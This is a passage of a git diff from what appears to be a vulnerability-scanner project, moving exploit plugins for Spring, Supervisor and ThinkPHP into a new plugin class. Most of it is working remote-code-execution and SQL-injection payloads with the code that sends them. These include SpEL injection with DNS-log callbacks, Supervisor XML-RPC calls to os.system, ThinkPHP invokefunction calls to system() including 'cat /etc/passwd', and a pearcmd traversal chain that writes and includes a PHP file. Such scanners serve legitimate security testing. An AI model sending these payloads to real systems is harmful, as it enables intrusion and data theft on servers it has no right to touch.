+        sessid = '8d2aba535b132733b453254c40e50f95'
+        
+        vul_info = {
+            'app_name': 'Spring',
+            'vul_type': 'RCE',
+            'vul_id': 'CVE-2017-8046',
+        }
+
+        headers = {
+            'Content-Type': 'application/json-patch+json'
+        }
+
+        # * 先使用POST请求添加一个对象, 防止目标不存在对象 导致漏洞利用失败
+        res1 = client.request(
+            'post',
+            '',
+            data='{}', 
+            headers={'Content-Type': 'application/json'},
+            allow_redirects=False,
+            vul_info=vul_info
+        )
+
+        for payload in self.payloads:
+            md = random_md5()                                       # * 随机md5值, 8位
+            dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
+            
+            # ! 该漏洞的Payload需要转换成ASCII码, 以逗号分隔每一个字母的ASCII编码
+            ascii_dns_domain = ''
+            for b in dns_domain:
+                ascii_dns_domain += str(ord(b)) + ','
+
+            path = payload['path']
+            data = payload['data'].replace('DNSDOMAIN', ascii_dns_domain[:-1])
+
+            res2 = client.request(
+                'patch',
+                path,
+                data=data, 
+                headers=headers,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res2 is None:
+                continue
+
+            if (dns.result(md, sessid)):
+                results = {
+                    'Target': res2.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Encodeing': 'ASCII',
+                    'Request': res2,
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Spring/spring-security-oauth-cve-2016-4977-rce.py b/payloads/Spring/spring-security-oauth-cve-2016-4977-rce.py
new file mode 100644
index 0000000..076e9d8
--- /dev/null
+++ b/payloads/Spring/spring-security-oauth-cve-2016-4977-rce.py
@@ -0,0 +1,63 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Spring Security OAuth2 远程命令执行
+    CVE-2016-4977
+        Payload: https://vulhub.org/#/environments/spring/CVE-2016-4977/
+
+Spring Security OAuth是为Spring框架提供安全认证支持的一个模块;
+    在其使用whitelabel views来处理错误时, 由于使用了Springs Expression Language (SpEL), 
+        攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令
+'''
+
+from lib.tool.md5 import random_int_2
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': 'oauth/authorize?response_type={RCECOMMAND}&client_id=acme&scope=openid&redirect_uri=http://test'},
+            {'path': 'authorize?response_type={RCECOMMAND}&client_id=acme&scope=openid&redirect_uri=http://test'},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'Spring',
+            'vul_type': 'RCE',
+            'vul_id': 'CVE-2016-4977',
+        }
+
+        for payload in self.payloads:
+            randomNum_1, randomNum_2 = random_int_2()
+            RCEcommand = '${' + str(randomNum_1) + '*' + str(randomNum_2) + '}'
+            
+            path = payload['path'].format(RCECOMMAND=RCEcommand)
+
+            res = client.request(
+                'get',
+                path,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+            
+            randomNum_sum = str(randomNum_1 * randomNum_2)
+
+            if (randomNum_sum in res.text):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Supervisor/cve_2017_11610.py b/payloads/Supervisor/cve_2017_11610.py
deleted file mode 100644
index 8aaa4da..0000000
--- a/payloads/Supervisor/cve_2017_11610.py
+++ /dev/null
@@ -1,91 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import random_int_2
-from time import sleep
-
-randomNum_1, randomNum_2 = random_int_2(5)
-
-cve_2017_11610_payloads = [
-    {
-        'path': 'RPC2',
-        'data-1': '''<?xml version='1.0'?>
-<methodCall>
-<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
-<params>
-<param>
-<value><string>expr {NUM1} + {NUM2} | tee -a /tmp/supervisord.log</string></value>
-</param>
-</params>
-</methodCall>'''.format(NUM1=randomNum_1, NUM2=randomNum_2),
-        'data-2': '''<?xml version='1.0'?>
-<methodCall>
-<methodName>supervisor.readLog</methodName>
-<params>
-<param>
-<value><int>0</int></value>
-</param>
-<param>
-<value><int>0</int></value>
-</param>
-</params>
-</methodCall>'''
-    },
-]
-
-def cve_2017_11610_scan(clients):
-    ''' Supervisord曝出了一个需认证的远程命令执行漏洞(CVE-2017-11610)
-        通过POST请求向Supervisord管理界面提交恶意数据, 可以获取服务器操作权限, 带来严重的安全风险
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'Supervisor',
-        'vul_type': 'RCE',
-        'vul_id': 'CVE-2017-11610',
-    }
-
-    headers = {
-        'Content-Type': 'text/xml'
-    }
-
-    for payload in cve_2017_11610_payloads:
-        path = payload['path']
-        data_1 = payload['data-1']
-        data_2 = payload['data-2']
-
-        res1 = client.request(
-            'post',
-            path,
-            data=data_1,
-            headers=headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res1 is None:
-            continue
-
-        sleep(2)
-
-        res2 = client.request(
-            'post',
-            path,
-            data=data_2,
-            headers=headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res2 is None:
-            continue
-
-        randomNum_sum = str(randomNum_1 + randomNum_2)
-
-        if (randomNum_sum in res2.text):
-            results = {
-                'Target': res2.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request-1': res1,
-                'Request-2': res2,
-            }
-            return results
-    return None
diff --git a/payloads/Supervisor/main.py b/payloads/Supervisor/main.py
deleted file mode 100644
index d2b4670..0000000
--- a/payloads/Supervisor/main.py
+++ /dev/null
@@ -1,33 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-Supervisor是用Python开发的一套通用的进程管理程序, 能将一个普通的命令行进程变为后台daemon, 并监控进程状态, 异常退出时能自动重启;
-是Linux/Unix系统下的一个进程管理工具, 不支持Windows系统;
-    Supervisor扫描类: 
-        1. Supervisord 远程命令执行
-            CVE-2017-11610
-                Payload: https://vulhub.org/#/environments/supervisor/CVE-2017-11610/
-
-file:///etc/passwd
-file:///C:/Windows/System32/drivers/etc/hosts
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.Supervisor.cve_2017_11610 import cve_2017_11610_scan
-
-class Supervisor():
-    def __init__(self):
-        self.app_name = 'Supervisor'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2017_11610_scan, clients=clients)
-        ]
-
-supervisor = Supervisor()
diff --git a/payloads/Supervisor/supervisor-cve-2017-11610-rce.py b/payloads/Supervisor/supervisor-cve-2017-11610-rce.py
new file mode 100644
index 0000000..adac7d9
--- /dev/null
+++ b/payloads/Supervisor/supervisor-cve-2017-11610-rce.py
@@ -0,0 +1,107 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Supervisor是用Python开发的一套通用的进程管理程序, 能将一个普通的命令行进程变为后台daemon, 并监控进程状态, 异常退出时能自动重启;
+是Linux/Unix系统下的一个进程管理工具, 不支持Windows系统;
+    Supervisord 远程命令执行
+        CVE-2017-11610
+            Payload: https://vulhub.org/#/environments/supervisor/CVE-2017-11610/
+
+Supervisord曝出了一个需认证的远程命令执行漏洞(CVE-2017-11610)
+    通过POST请求向Supervisord管理界面提交恶意数据, 可以获取服务器操作权限, 带来严重的安全风险
+'''
+
+from lib.tool.md5 import random_int_2
+from time import sleep
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.randomNum_1, self.randomNum_2 = random_int_2(5)
+        self.randomNum_sum = str(self.randomNum_1 + self.randomNum_2)
+
+        self.payloads = [
+            {
+                'path': 'RPC2',
+                'data-1': '''<?xml version='1.0'?>
+        <methodCall>
+        <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
+        <params>
+        <param>
+        <value><string>expr {NUM1} + {NUM2} | tee -a /tmp/supervisord.log</string></value>
+        </param>
+        </params>
+        </methodCall>'''.format(NUM1=self.randomNum_1, NUM2=self.randomNum_2),
+                'data-2': '''<?xml version='1.0'?>
+        <methodCall>
+        <methodName>supervisor.readLog</methodName>
+        <params>
+        <param>
+        <value><int>0</int></value>
+        </param>
+        <param>
+        <value><int>0</int></value>
+        </param>
+        </params>
+        </methodCall>'''
+            },
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'Supervisor',
+            'vul_type': 'RCE',
+            'vul_id': 'CVE-2017-11610',
+        }
+
+        headers = {
+            'Content-Type': 'text/xml'
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+            data_1 = payload['data-1']
+            data_2 = payload['data-2']
+
+            res1 = client.request(
+                'post',
+                path,
+                data=data_1,
+                headers=headers,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res1 is None:
+                continue
+
+            sleep(2)
+
+            res2 = client.request(
+                'post',
+                path,
+                data=data_2,
+                headers=headers,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res2 is None:
+                continue
+
+            if (self.randomNum_sum in res2.text):
+                results = {
+                    'Target': res2.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request-1': res1,
+                    'Request-2': res2,
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/ThinkPHP/_2_x_rce.py b/payloads/ThinkPHP/_2_x_rce.py
deleted file mode 100644
index 96e5caa..0000000
--- a/payloads/ThinkPHP/_2_x_rce.py
+++ /dev/null
@@ -1,39 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-thinkphp_2_x_rce_payloads = [
-    {'path': 'index.php?s=/index/index/name/$%7B@phpinfo()%7D'},
-]
-
-def rce_2_x_scan(clients):
-    ''' ThinkPHP 2.x版本中, 使用preg_replace的/e模式匹配路由; 
-            导致用户的输入参数被插入双引号中执行, 造成任意代码执行漏洞; 
-            ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞, 也存在这个漏洞
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'ThinkPHP',
-        'vul_type': 'RCE',
-        'vul_id': 'thinkphp-2.x-rce',
-    }
-
-    for payload in thinkphp_2_x_rce_payloads:
-        path = payload['path']
-
-        res = client.request(
-            'get',
-            path,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (('PHP Version' in res.text) and ('PHP License' in res.text)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/ThinkPHP/_5_ids_sqlinject.py b/payloads/ThinkPHP/_5_ids_sqlinject.py
deleted file mode 100644
index 5442594..0000000
--- a/payloads/ThinkPHP/_5_ids_sqlinject.py
+++ /dev/null
@@ -1,36 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-thinkphp_5_ids_sqlinject_payloads = [
-    {'path': 'index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1'},
-]
-
-def ids_sqlinject_5_scan(clients):
-    ''' ThinkPHP5 SQL注入漏洞&&敏感信息泄露漏洞 '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'ThinkPHP',
-        'vul_type': 'SQLinject',
-        'vul_id': 'thinkphp-5-ids-sqlinject',
-    }
-
-    for payload in thinkphp_5_ids_sqlinject_payloads:
-        path = payload['path']
-
-        res = client.request(
-            'get',
-            path,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (('XPATH syntax error' in res.text) and ('Database Config' in res.text)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/ThinkPHP/cnnvd_201901_445.py b/payloads/ThinkPHP/cnnvd_201901_445.py
deleted file mode 100644
index 8bae982..0000000
--- a/payloads/ThinkPHP/cnnvd_201901_445.py
+++ /dev/null
@@ -1,47 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import random_md5
-from lib.tool import check
-
-cnnvd_201901_445_payloads = [
-    {
-        'path': 'index.php?s=captcha',
-        'data': '_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]={RCECOMMAND}'
-    }
-]
-
-def cnnvd_201901_445_scan(clients):
-    ''' ThinkPHP5 核心类Request远程代码执行'''
-    client = clients.get('reqClient')
-
-    vul_info = {
-        'app_name': 'ThinkPHP',
-        'vul_type': 'RCE',
-        'vul_id': 'CNNVD-201901-445',
-    }
-
-    for payload in cnnvd_201901_445_payloads:
-        randomStr = random_md5(6)
-        RCEcommand = 'echo ' + randomStr
-        
-        path = payload['path']
-        data = payload['data'].format(RCECOMMAND=RCEcommand)
-
-        res = client.request(
-            'post',
-            path,
-            data=data,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (check.check_res(res.text, randomStr)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/ThinkPHP/cnvd_2018_24942.py b/payloads/ThinkPHP/cnvd_2018_24942.py
deleted file mode 100644
index 7f4fd4d..0000000
--- a/payloads/ThinkPHP/cnvd_2018_24942.py
+++ /dev/null
@@ -1,48 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import random_md5
-from lib.tool import check
-
-cnvd_2018_24942_payloads = [
-    {'path': 'index.php?s=index/\\think\Request/input&filter[]=system&data={RCECOMMAND}'},
-    {'path': 'index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]={RCECOMMAND}'},
-    {'path': 'index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]={RCECOMMAND}'},
-    {'path': 'index.php?s=index/\\think\\view\driver\Php/display&content=<?php phpinfo();?>'}
-]
-
-def cnvd_2018_24942_scan(clients):
-    ''' ThinkPHP5 未开启强制路由RCE'''
-    client = clients.get('reqClient')
-
-    vul_info = {
-        'app_name': 'ThinkPHP',
-        'vul_type': 'RCE',
-        'vul_id': 'CNVD-2018-24942',
-    }
-
-    for payload in cnvd_2018_24942_payloads:
-        randomStr = random_md5(6)
-        RCEcommand = 'echo ' + randomStr
-        
-        path = payload['path'].format(RCECOMMAND=RCEcommand)
-
-        res = client.request(
-            'get',
-            path,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (check.check_res(res.text, randomStr) 
-            or (('PHP Version' in res.text) 
-                and ('PHP License' in res.text))
-        ):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/ThinkPHP/cnvd_2022_86535.py b/payloads/ThinkPHP/cnvd_2022_86535.py
deleted file mode 100644
index 9734ad1..0000000
--- a/payloads/ThinkPHP/cnvd_2022_86535.py
+++ /dev/null
@@ -1,98 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.initial.config import config
-from lib.tool.md5 import md5, random_md5, random_int_1
-
-baseHeaders = config.get('headers')
-
-if baseHeaders.get('Cookie'):
-    cookie_payload = 'think_lang=../../../../../../../../usr/local/lib/php/pearcmd'
-    new_cookie = baseHeaders.get('Cookie') + '; ' + cookie_payload
-else:
-    new_cookie = 'think_lang=../../../../../../../../usr/local/lib/php/pearcmd'
-
-cnvd_2022_86535_payloads = [
-    {
-        'path-1': 'index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?=md5({NUM})?>+/tmp/{FILENAME}.php',
-        'headers-1': {},
-        'path-2': 'index.php?lang=../../../../../../../../tmp/{FILENAME}',
-    },
-    {
-        'path-1': 'public/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?=md5({NUM})?>+/tmp/{FILENAME}.php',
-        'headers-1': {},
-        'path-2': 'public/index.php?lang=../../../../../../../../tmp/{FILENAME}',
-    },
-    {
-        'path-1': 'index.php?+config-create+/<?=md5({NUM})?>+/tmp/{FILENAME}.php',
-        'headers-1': {'think-lang': '../../../../../../../../usr/local/lib/php/pearcmd'},
-        'path-2': 'index.php?lang=../../../../../../../../tmp/{FILENAME}',
-    },
-    {
-        'path-1': 'public/index.php?+config-create+/<?=md5({NUM})?>+/tmp/{FILENAME}.php',
-        'headers-1': {'think-lang': '../../../../../../../../usr/local/lib/php/pearcmd'},
-        'path-2': 'public/index.php?lang=../../../../../../../../tmp/{FILENAME}',
-    },
-    {
-        'path-1': 'index.php?+config-create+/<?=md5({NUM})?>+/tmp/{FILENAME}.php',
-        'headers-1': {'Cookie': new_cookie},
-        'path-2': 'index.php?lang=../../../../../../../../tmp/{FILENAME}',
-    },
-    {
-        'path-1': 'public/index.php?+config-create+/<?=md5({NUM})?>+/tmp/{FILENAME}.php',
-        'headers-1': {'Cookie': new_cookie},
-        'path-2': 'public/index.php?lang=../../../../../../../../tmp/{FILENAME}',
-    },
-]
-
-def cnvd_2022_86535_scan(clients):
-    ''' 如果 Thinkphp 程序开启了多语言功能, 
-            攻击者可以通过 get、header、cookie 等位置传入参数, 实现目录穿越+文件包含, 
-            通过pearcmd文件包含这个trick即可实现RCE
-        v6.0.1 < Thinkphp < v6.0.13,
-        Thinkphp v5.0.x,
-        Thinkphp v5.1.x,
-    '''
-    hackClient = clients.get('hackClient')
-
-    vul_info = {
-        'app_name': 'ThinkPHP',
-        'vul_type': 'RCE',
-        'vul_id': 'CNVD-2022-86535',
-    }
-
-    for payload in cnvd_2022_86535_payloads:
-        randomNum = random_int_1(6)
-        randomFileName = random_md5()
-
-        path_1 = payload['path-1'].format(NUM=randomNum, FILENAME=randomFileName)
-        headers_1 = payload['headers-1']
-        path_2 = payload['path-2'].format(FILENAME=randomFileName)
-
-        res1 = hackClient.request(
-            'get',
-            path_1,
-            headers=headers_1,
-            vul_info=vul_info
-        )
-        if res1 is None:
-            continue
-
-        res2 = hackClient.request(
-            'get',
-            path_2,
-            vul_info=vul_info
-        )
-        if res2 is None:
-            continue
-
-        md = md5(str(randomNum), 32)
-        if (md in res2.text):
-            results = {
-                'Target': res2.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request-1': res1,
-                'Request-2': res2,
-            }
-            return results
-    return None
diff --git a/payloads/ThinkPHP/cve_2018_1002015.py b/payloads/ThinkPHP/cve_2018_1002015.py
deleted file mode 100644
index 8147256..0000000
--- a/payloads/ThinkPHP/cve_2018_1002015.py
+++ /dev/null
@@ -1,63 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import random_md5
-from lib.tool import check
-
-cve_2018_1002015_payloads = [
-    {
-        'path': 'index.php?s=index/\\think\\Container/invokefunction',
-        'data': 'function=call_user_func_array&vars[0]=system&vars[1][]={RCECOMMAND}',
-    },
-    {
-        'path': 'index.php?s=index/\\think\\Container/invokefunction',
-        'data': 'function=call_user_func_array&vars[0]=system&vars[1][]=cat /etc/passwd',
-    },
-    {
-        'path': 'index.php?s=index/\\think\\Container/invokefunction',
-        'data': 'function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1',
-    }
-]
-
-def cve_2018_1002015_scan(clients):
-    ''' ThinkPHP 5.0.23及5.1.31以下版本RCE
-        ThinkPHP 5.0.x版本和5.1.x版本中存在远程代码执行漏洞, 
-        该漏洞源于ThinkPHP在获取控制器名时未对用户提交的参数进行严格的过滤,
-        远程攻击者可通过输入字符 \ 的方式调用任意方法利用该漏洞执行代码
-    '''
-    client = clients.get('reqClient')
-
-    vul_info = {
-        'app_name': 'ThinkPHP',
-        'vul_type': 'RCE',
-        'vul_id': 'CVE-2018-1002015',
-    }
-
-    for payload in cve_2018_1002015_payloads:
-        randomStr = random_md5(6)
-        RCEcommand = 'echo ' + randomStr
-        
-        path = payload['path']
-        data = payload['data'].format(RCECOMMAND=RCEcommand)
-
-        res = client.request(
-            'post',
-            path,
-            data=data,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (check.check_res(res.text, randomStr)
-            or check.check_res_fileread(res.text)
-            or (('PHP Version' in res.text) 
-                and ('PHP License' in res.text))
-        ):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/ThinkPHP/main.py b/payloads/ThinkPHP/main.py
deleted file mode 100644
index 4c84aca..0000000
--- a/payloads/ThinkPHP/main.py
+++ /dev/null
@@ -1,95 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-    ThinkPHP扫描类: 
-        1. ThinkPHP5 未开启强制路由RCE
-            CNVD-2018-24942
-                Payload: https://bbs.zkaq.cn/t/5636.html
-
-        2. ThinkPHP5 核心类Request远程代码执行
-            CNNVD-201901-445
-                Payload: https://bbs.zkaq.cn/t/5636.html
-
-        3. ThinkPHP2.x preg_replace函数使用不当RCE
-            暂无编号
-                Payload: https://vulhub.org/#/environments/thinkphp/2-rce/
-
-        4. ThinkPHP5 ids参数 sql注入漏洞
-            暂无编号
-                Payload: https://vulhub.org/#/environments/thinkphp/in-sqlinjection/
-
-        5. ThinkPHP5.x 远程代码执行
-            CVE-2018-1002015
-                Payload: https://www.cnblogs.com/defyou/p/15762860.html
-
-        6. ThinkPHP 多语言RCE
-            CNVD-2022-86535
-                Payload: https://mp.weixin.qq.com/s/jECbQ4KodbCrEvoCQFSosw
-
-其它奇奇怪怪的Payload: https://baizesec.github.io/
-'''
-
-from lib.tool.thread import thread
-from payloads.ThinkPHP._2_x_rce import rce_2_x_scan
-from payloads.ThinkPHP._5_ids_sqlinject import ids_sqlinject_5_scan
-from payloads.ThinkPHP.cnnvd_201901_445 import cnnvd_201901_445_scan
-from payloads.ThinkPHP.cnvd_2018_24942 import cnvd_2018_24942_scan
-from payloads.ThinkPHP.cve_2018_1002015 import cve_2018_1002015_scan
-from payloads.ThinkPHP.cnvd_2022_86535 import cnvd_2022_86535_scan
-
-class ThinkPHP():
-    def __init__(self):
-        self.app_name = 'ThinkPHP'
-
-        # * 以下payload暂时没写poc
-        self.thinkphp_5_options_sqlinject_payloads = [
-            {
-                'path': 'index?options=id)%2bupdatexml(1,concat(0x7,user(),0x7e),1) from users%23 **',
-                'data': ''
-            },
-            {
-                'path': 'index?options=id`)%2bupdatexml(1,concat(0x7,user(),0x7e),1) from users%23',
-                'data': ''
-            }
-        ]
-
-        self.thinkphp_5_username_sqlinject_payloads = [
-            {
-                'path': 'index/index/index?username[0]=inc&username[1]=updatexml(1,concat(0x7,user(),0x7e),1)&username[2]=1 ',
-                'data': ''
-            },
-            {
-                'path': '?username[0]=point&username[1]=1&username[2]=updatexml(1,concat(0x7,user(),0x7e),1)^&username[3]=0 ',
-                'data': ''
-            }
-        ]
-
-        self.thinkphp_5_orderby_sqlinject_payloads = [
-            {
-                'path': 'index/index/index?orderby[id`|updatexml(1,concat(0x7,user(),0x7e),1)%23]=1 ',
-                'data': ''
-            }
-        ]
-
-        self.thinkphp_5_include_payloads = [
-            {
-                'path': 'index/index/index?cacheFile=1.jpg',
-                'data': ''
-            }
-        ]
-    
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=rce_2_x_scan, clients=clients),
-            thread(target=ids_sqlinject_5_scan, clients=clients),
-            thread(target=cnnvd_201901_445_scan, clients=clients),
-            thread(target=cnvd_2018_24942_scan, clients=clients),
-            thread(target=cve_2018_1002015_scan, clients=clients),
-            thread(target=cnvd_2022_86535_scan, clients=clients),
-        ]
-
-thinkphp = ThinkPHP()
\ No newline at end of file
diff --git a/payloads/ThinkPHP/main.txt b/payloads/ThinkPHP/main.txt
new file mode 100644
index 0000000..942e8dc
--- /dev/null
+++ b/payloads/ThinkPHP/main.txt
@@ -0,0 +1,36 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+# * 以下payload暂时没写poc
+thinkphp_5_options_sqlinject_payloads = [
+    {
+        'path': 'index?options=id)%2bupdatexml(1,concat(0x7,user(),0x7e),1) from users%23 **',
+        'data': ''
+    },
+    {
+        'path': 'index?options=id`)%2bupdatexml(1,concat(0x7,user(),0x7e),1) from users%23',
+        'data': ''
+    }
+]
+thinkphp_5_username_sqlinject_payloads = [
+    {
+        'path': 'index/index/index?username[0]=inc&username[1]=updatexml(1,concat(0x7,user(),0x7e),1)&username[2]=1 ',
+        'data': ''
+    },
+    {
+        'path': '?username[0]=point&username[1]=1&username[2]=updatexml(1,concat(0x7,user(),0x7e),1)^&username[3]=0 ',
+        'data': ''
+    }
+]
+thinkphp_5_orderby_sqlinject_payloads = [
+    {
+        'path': 'index/index/index?orderby[id`|updatexml(1,concat(0x7,user(),0x7e),1)%23]=1 ',
+        'data': ''
+    }
+]
+thinkphp_5_include_payloads = [
+    {
+        'path': 'index/index/index?cacheFile=1.jpg',
+        'data': ''
+    }
+]
\ No newline at end of file
diff --git a/payloads/ThinkPHP/thinkphp-2.x-rce.py b/payloads/ThinkPHP/thinkphp-2.x-rce.py
new file mode 100644
index 0000000..899b90a
--- /dev/null
+++ b/payloads/ThinkPHP/thinkphp-2.x-rce.py
@@ -0,0 +1,55 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+ThinkPHP2.x preg_replace函数使用不当RCE
+    暂无编号
+        Payload: https://vulhub.org/#/environments/thinkphp/2-rce/
+
+ThinkPHP 2.x版本中, 使用preg_replace的/e模式匹配路由; 
+    导致用户的输入参数被插入双引号中执行, 造成任意代码执行漏洞; 
+    ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞, 也存在这个漏洞
+'''
+
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': 'index.php?s=/index/index/name/$%7B@phpinfo()%7D'},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'ThinkPHP',
+            'vul_type': 'RCE',
+            'vul_id': 'thinkphp-2.x-rce',
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+
+            res = client.request(
+                'get',
+                path,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (('PHP Version' in res.text) and ('PHP License' in res.text)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/ThinkPHP/thinkphp-5-ids-sqlinject.py b/payloads/ThinkPHP/thinkphp-5-ids-sqlinject.py
new file mode 100644
index 0000000..7d98926
--- /dev/null
+++ b/payloads/ThinkPHP/thinkphp-5-ids-sqlinject.py
@@ -0,0 +1,53 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+ThinkPHP5 ids参数 sql注入漏洞
+    暂无编号
+        Payload: https://vulhub.org/#/environments/thinkphp/in-sqlinjection/
+
+ThinkPHP5 SQL注入漏洞&&敏感信息泄露漏洞
+'''
+
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': 'index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1'},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'ThinkPHP',
+            'vul_type': 'SQLinject',
+            'vul_id': 'thinkphp-5-ids-sqlinject',
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+
+            res = client.request(
+                'get',
+                path,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (('XPATH syntax error' in res.text) and ('Database Config' in res.text)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/ThinkPHP/thinkphp-cnnvd-201901-445-rce.py b/payloads/ThinkPHP/thinkphp-cnnvd-201901-445-rce.py
new file mode 100644
index 0000000..cf4088a
--- /dev/null
+++ b/payloads/ThinkPHP/thinkphp-cnnvd-201901-445-rce.py
@@ -0,0 +1,67 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+ThinkPHP5 核心类Request远程代码执行
+    CNNVD-201901-445
+        Payload: https://bbs.zkaq.cn/t/5636.html
+
+ThinkPHP5 核心类Request远程代码执行
+'''
+
+from lib.tool.md5 import random_md5
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {
+                'path': 'index.php?s=captcha',
+                'data': '_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]={RCECOMMAND}'
+            }
+        ]
+    
+    def POC(self, clients):
